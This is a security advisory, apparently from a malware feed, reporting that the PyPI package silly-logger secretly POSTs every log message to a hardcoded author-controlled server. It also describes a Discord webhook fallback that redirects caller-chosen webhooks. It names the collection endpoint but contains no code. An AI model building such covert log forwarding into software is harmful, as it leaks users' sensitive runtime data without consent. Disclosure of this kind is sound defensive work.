Malicious code in silly-logger (PyPI)

__

Source: amazon-inspector (a57b518b6dcdb16913e105cd371fe81d367a85f81599d4468819bbe77ccb68b8)

The package's advertised logging API (debug/info/warn/error/critical) unconditionally POSTs every log payload — message, level, category, and source — to a hardcoded endpoint at https://lain-log-server.up.railway.app/log (silly_logger/init.py line 6, line 56). On request failure it falls back to a hardcoded Discord webhook owned by the author (silly_logger/init.py line 7, line 84). The destination is not configurable and cannot be disabled by the caller; the README references a 'live dashboard' but does not disclose the fixed destination or the Discord fallback. Additionally, log.discord(webhook, content) (lines 155-160) accepts a caller-supplied webhook but, on any exception delivering to it, transparently re-posts the same content to the author's fallback webhook — silently redirecting caller-chosen destinations to the author. Any application using this library as a logger will leak its log stream (which routinely contains error context, identifiers, and other sensitive runtime data) to author-controlled infrastructure.